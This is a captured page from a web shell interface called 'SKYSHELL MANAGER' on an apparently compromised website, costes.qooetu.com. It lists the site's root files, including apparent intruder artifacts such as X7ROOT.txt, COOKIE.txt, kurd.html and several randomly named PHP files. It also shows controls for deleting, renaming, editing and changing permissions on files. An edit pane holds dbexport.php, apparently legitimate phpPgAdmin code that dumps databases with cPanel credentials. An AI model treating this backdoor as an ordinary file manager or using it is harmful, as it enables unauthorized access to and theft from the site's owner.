📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: dbexport.php
<?php /** * Does an export of a database, schema, or table (via pg_dump) * to the screen or as a download. * * $Id: dbexport.php,v 1.22 2007/03/25 03:15:09 xzilla Exp $ */ // Prevent timeouts on large exports (non-safe mode only) if (!ini_get('safe_mode')) set_time_limit(0); // Include application functions $_no_output = true; $f_schema = $f_object = ''; include_once('./libraries/lib.inc.php'); putenv('LD_LIBRARY_PATH='); // Are we doing a cluster-wide dump or just a per-database dump // We are always going to be doing a per-database dump, so set this to false. $dumpall = false; // Check that database dumps are enabled. if ($misc->isDumpEnabled($dumpall)) { $server_info = $misc->getServerInfo(); // Get the path of the pg_dump/pg_dumpall executable $exe = $misc->escapeShellCmd($server_info[$dumpall ? 'pg_dumpall_path' : 'pg_dump_path']); // Obtain the pg_dump version number and check if the path is good $version = array(); preg_match("/(\d+(?:\.\d+)?)(?:\.\d+)?.*$/", exec($exe . " --version"), $version); if (empty($version)) { if ($dumpall) printf($lang['strbadpgdumpallpath'], $server_info['pg_dumpall_path']); else printf($lang['strbadpgdumppath'], $server_info['pg_dump_path']); exit; } // Make it do a download, if necessary switch($_REQUEST['output']){ case 'show': header('Content-Type: text/plain'); break; case 'download': // Set headers. MSIE is totally broken for SSL downloading, so // we need to have it download in-place as plain text if (strstr($_SERVER['HTTP_USER_AGENT'], 'MSIE') && isset($_SERVER['HTTPS'])) { header('Content-Type: text/plain'); } else { header('Content-Type: application/download'); header('Content-Disposition: attachment; filename=dump.sql'); } break; case 'gzipped': // MSIE in SSL mode cannot do this - it should never get to this point header('Content-Type: application/download'); header('Content-Disposition: attachment; filename=dump.sql.gz'); break; } // BEGIN -- cPanel cpses support $connect_username = $server_info['username']; $connect_password = $server_info['password']; $connect_host = $server_info['host']; $connect_port = $server_info['port']; if ($_ENV['REAL_DBOWNER']) { $split_user = explode('_', $connect_username); if ($split_user[0] == "cpses") { $connect_password = $connect_username . "_" . $connect_password; $connect_username = $_ENV['REAL_DBOWNER']; $connect_host = "127.0.0.200"; # uses pam auth } } // END -- cPanel cpses support // Set environmental variables that pg_dump uses putenv('PGPASSWORD=' . $connect_password); putenv('PGUSER=' . $connect_username); $hostname = $connect_host; if ($hostname !== null && $hostname != '') { putenv('PGHOST=' . $hostname); } $port = $connect_port; if ($port !== null && $port != '') { putenv('PGPORT=' . $port); } // Build command for executing pg_dump. $cmd = $exe; // we are PG 7.4+, so we always have a schema if (isset($_REQUEST['schema'])) { $f_schema = $_REQUEST['schema']; $data->fieldClean($f_schema); } // Check for a specified table/view switch ($_REQUEST['subject']) { case 'schema': // This currently works for 8.2+ (due to the orthoganl -t -n issue introduced then) $cmd .= " -n " . $misc->escapeShellArg("\"{$f_schema}\""); break; case 'table': case 'view': $f_object = $_REQUEST[$_REQUEST['subject']]; $data->fieldClean($f_object); // Starting in 8.2, -n and -t are orthogonal, so we now schema qualify // the table name in the -t argument and quote both identifiers if ( ((float) $version[1]) >= 8.2 ) { $cmd .= " -t " . $misc->escapeShellArg("\"{$f_schema}\".\"{$f_object}\""); } else { // If we are 7.4 or higher, assume they are using 7.4 pg_dump and // set dump schema as well. Also, mixed case dumping has been fixed // then.. $cmd .= " -t " . $misc->escapeShellArg($f_object) . " -n " . $misc->escapeShellArg($f_schema); } } // Check for GZIP compression specified if ($_REQUEST['output'] == 'gzipped' && !$dumpall) { $cmd .= " -Z 9"; } switch ($_REQUEST['what']) { case 'dataonly': $cmd .= ' -a'; if ($_REQUEST['d_format'] == 'sql') $cmd .= ' --inserts'; elseif (isset($_REQUEST['d_oids'])) $cmd .= ' -o'; break; case 'structureonly': $cmd .= ' -s'; if (isset($_REQUEST['s_clean'])) $cmd .= ' -c'; break; case 'structureanddata': if ($_REQUEST['sd_format'] == 'sql') $cmd .= ' --inserts'; elseif (isset($_REQUEST['sd_oids'])) $cmd .= ' -o'; if (isset($_REQUEST['sd_clean'])) $cmd .= ' -c'; break; } if (!$dumpall) { putenv('PGDATABASE=' . $_REQUEST['database']); } // Execute command and return the output to the screen passthru($cmd); } ?>
Save